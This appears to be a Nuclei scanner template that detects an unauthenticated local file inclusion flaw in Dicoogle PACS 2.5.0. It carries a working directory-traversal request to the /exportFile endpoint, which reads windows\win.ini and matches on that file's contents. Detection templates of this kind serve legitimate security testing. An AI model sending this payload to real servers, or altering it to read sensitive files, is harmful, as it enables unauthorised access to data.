id: dicoogle-pacs-lfi info: name: Dicoogle PACS 2.5.0 - Local File Inclusion author: 0x_akoko severity: high description: Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required. reference: - https://www.exploit-db.com/exploits/45007 - https://cxsecurity.com/issue/WLB-2018070131 - http://www.dicoogle.com/home classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: edb,windows,lfi,dicoogle requests: - method: GET path: - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini" matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and # Enhanced by mp on 2022/07/22